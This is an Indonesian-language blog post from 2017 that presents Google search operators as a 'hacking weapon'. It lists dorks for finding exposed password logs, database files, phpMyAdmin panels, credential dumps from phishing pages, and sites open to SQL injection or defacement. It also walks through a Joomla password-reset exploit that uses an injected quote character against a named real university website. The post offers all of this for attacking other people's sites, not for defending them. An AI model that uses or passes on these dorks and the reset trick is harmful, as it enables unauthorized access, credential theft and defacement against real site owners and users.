Assalamualaikum.wr.wb ^_^
gw mau ngasihtau sedikit ngingetin nih apa itu google Dork
Google dork sebagai senjata hacking...Banyak pencarian yang kita inginkan pada search engines tidak
seperti yang diharapkan, mengapa??, karena keyword yang anda masukan kurang sesuai dengan keyword-keyword yang tersimpan di mesin search engines...
Sehingga untuk mempermudahnya Google menyediakan fasilitas-fasilitas (dork), untuk mempermudahkan suatu pencarian, bahkan kita juga dapat melakukan hacking (melihat password)
account orang lain yang terindex oleh google.
Type Dork yang paling banyak digunakan pasti Intitle,site,inurl,dan intext.. entah mengapa :D padahal banyak loh yang lain..
Nih gw jelasin beberapa Dork nya,..
intitle dan allintitle
(Mencari judul/title pada suatu web)
inurl dan allinurl
(Mencari suatu string yang terdapat pada url)
filetype
(Mencari suatu file secara lebih spesifik)
allintext
(Mencari suatu nilai string dalam suatu web)
site
(Mencari pada web tertentu)
link
(Mencari web2 yang mempunyai link pada web yang di pilih)
Yang lainnya ada di bawah lohhh...
contoh dalam pengguunaannya:
Apabila kita ingin mencair sebuah lagu dari avril maka kita ketikan sja di google seperti ini
intitle:"index of/avril"
dan apa hasilnya, akan kelihatan semua kumpulan lagu2 tsb, dan dengan mudah untuk kita mendownloadnya.
Pengertian diatas, mksdnya biasanya dalam sebuah databse file web
terdapat kata ( index of ) maka kita gunaka fungsi intitle untuk
mencari sebuah title yang berkaitan dengan kata ( index of ), llu
ketikan kata avril agar google mencari database file tentg kata-kata
avril
Apabila kita ingin mencair sebuah skripsi maka kita ketikan sja di google seperti ini
intitle:"index of" "skripsi" site:.com
mksudnya site:ac.id itu biasanya url untuk kampus berakhiran .com
dan ini contoh2 lain dalam penggunaan google dork
inurl:"guest | book" "html allowed"
inurl:password.log
intitle:"index of" password.txt site:my
intitle:"index of" admin.mdb
intitle:"index of" member.mdb
intitle:"phpmyadmin" "running on localhost"
intitle:"index of" "data base" site:id
inurl:database.inc site:id
inurl:connector.txt site:id
site:mr filetype:.doc
sehingga kita bisa menggunakan google ini untk senjata hacking kita:
misalkan kita ingin mencoba untuk menembus pada web dari joomla dengan menggunakan token (').
biasanya url ketika memasukan token tsb adlah
*******.com/index.php?option=com_user&view=reset&layout=confirm
di url tsb terdapat tulsan option=com_user
mka dgn sedikit logika, kita coba menggunakan type ( inurl ) u/ mencari url yg berkaitan dengan kata option=com_user
ketikan di google >>>>> inurl:"option=com_user"
dan akan terlihat hasilnya, kita ambil contoh pada web indonesia saja,
http://www.lbifib.ui.ac.id/index.php?option=com_user&view=login lalu hapus pada url (/index.php?option=com_user&view=login) dan ganti url tersebut menjadi
http://www.lbifib.ui.ac.id/index.php?option=com_user&view=reset&layout=confirm lalu ketikan token '
dan apa hasilnya, password sudah bisa kita reset ulang,,,,
sekarang tinggal bagaimana kita meng-applikasikan kata tersebut agar bisa mencari celah pada suatu URL website.
Dork Email
Dork Rapidshare
Expiration-date:*2010 +login: rapidshare.com
Note : Date nya tinggal ganti sesuka kita, mau di ubah ke 2011- 2012- 2013. Etc
Dork Fake Login
Untuk mencari email beserta Password hasil phishing bisa jga menggunakan google Dork
search z di google dengan dork ini ^-^
DORK ->
intext:"Date Submitted" intext:"password" intext:"email" inurl:"logs.txt"
(Dork Untuk Defes)
Sebagian Dork untuk Aksi Defes
Sekarang tinggal copy salah satu Dork diatas, di google.com/.co.id Etc & liat hasilnya ^_^
Untuk memudahkan dan memaksimalkan penggunaan dork, bisa saja mengganti domain di search engine
www.google.com.my Etc atau
seperti penggunaan google dork diatas (Nama domain/target di simpan dibelakang Dork Ex:allinurl:"union+all+select" site:co.il )
Nih, gw kasih rahasia nya :D
Biar kaga make yang inurl,intitle,site,intext :'v Rugi loh, padahal kan banyak :p
Jujur, pasti banyak yang make Dork: inurl:".php?ID=" :D
Sory kalo gw alay :v
bonus :
| Search Service | Search Operators |
|---|---|
| Web Search | allinanchor:, allintext:, allintitle:, allinurl:, cache:, define:, filetype:, id:, inanchor:, info:,intext:, intitle:, inurl:, link:, related:, site: |
| Image Search | allintitle:, allinurl:, filetype:, inurl:, intitle:, site: |
| Groups | allintext:, allintitle:, author:, group:, insubject:, intext:, intitle: |
| Directory | allintext:, allintitle:, allinurl:, ext:, filetype:, intext:, intitle:, inurl: |
| News | allintext:, allintitle:, allinurl:, intext:, intitle:, inurl:, location:, source: |
| Product Search | allintext:, allintitle: |
Oleh Naats Dev
Maret 27, 2017
Maret 27, 2017